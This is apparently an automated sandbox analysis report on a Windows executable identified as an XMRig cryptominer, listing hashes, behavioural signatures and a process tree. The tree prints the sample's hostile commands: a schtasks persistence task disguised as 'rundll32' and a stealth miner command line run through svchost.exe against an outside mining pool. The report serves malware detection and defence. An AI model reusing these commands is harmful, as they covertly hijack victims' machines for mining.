Overview

overview

10

Static

static

3

67654a92f8...a8.exe

windows7-x64

10

67654a92f8...a8.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 01:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe

  • Size

    2.5MB

  • MD5

    8e23251437fa1dee266f37fb780849df

  • SHA1

    936748a0298a97950b7ce34de64a79074db21eeb

  • SHA256

    67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8

  • SHA512

    46a988454007930915a41467eaec792575d2fc4d3c30e1d4f0287a7d904d6f929235206386cd1cfeb756b84875442a7ff172549d2e209be257782298170e082c

  • SSDEEP

    49152:J846cK0B7PlZRb1aLeb2eIitRSq10qaJF1CQC0Tn:JQcK0hPtpBZIitgT9F1hC4

Score
10/10
xmrigdiscoveryminer

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 8 IoCs
    miner
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe
    "C:\Users\Admin\AppData\Local\Temp\67654a92f862e349484e1a617ecf9dd7d3959d026f429f1480919be6dc41baa8.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3708
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "rundll32" /tr "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1384
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "rundll32" /tr "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5008
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\rundll32.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Users\Admin\AppData\Local\Temp\rundll32.exe
          C:\Users\Admin\AppData\Local\Temp\rundll32.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1480
          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            5⤵
            • Executes dropped EXE
            PID:4440
          • C:\Windows\System32\svchost.exe
            C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6146704 --pass=myminer --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=10 --cinit-idle-cpu=80 --cinit-stealth
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1284
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:532

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
    Filesize

    2.2MB

    MD5

    e2f6770cd6b8a5b511f11040a226ef6f

    SHA1

    5815d379aa8e3fa61173451ae7050ce082839c5f

    SHA256

    55bf65b6eb3e5132b4716619de626731e38b27dfcf53b69f47beb1634e9403b0

    SHA512

    db24d848af3f4de9d47962671e0471a494fa343d35ec2ac4a357616b259c3b07b7e1a2422c1d239fad9bde80726d04fa0986a99cc01a814daacd083552d03b5e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Filesize

    7KB

    MD5

    ede8f46793b04053a664edb7e254e01f

    SHA1

    3148e8d408a956195e37c0084ffa99b3986aa08c

    SHA256

    7b0117c87556fa7fd347f9a5cac49c4502279961bd19307953f3c15c57f2e121

    SHA512

    719aacee2752688f4f9cfd423fdb0508e8b810c7fd28ecf6a4e14b96e828b8e86e1b3fa2754e6a05ccc2adb52dcad7dcca45792815ad07946fcc1dc19290b109

    Download Submit

  • memory/1284-45-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/1284-38-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/1284-40-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/1284-41-0x000001C9EA3D0000-0x000001C9EA3F0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/1284-46-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/1284-44-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/1284-43-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/1284-42-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/1284-48-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

    Download

  • memory/2916-17-0x0000000000CF0000-0x0000000000D02000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2916-16-0x000000001C2A0000-0x000000001C4B8000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/2916-15-0x00000000000F0000-0x0000000000320000-memory.dmp

    Filesize

    2.2MB

    Download

  • memory/4440-37-0x0000000000E00000-0x0000000000E06000-memory.dmp

    Filesize

    24KB

    Download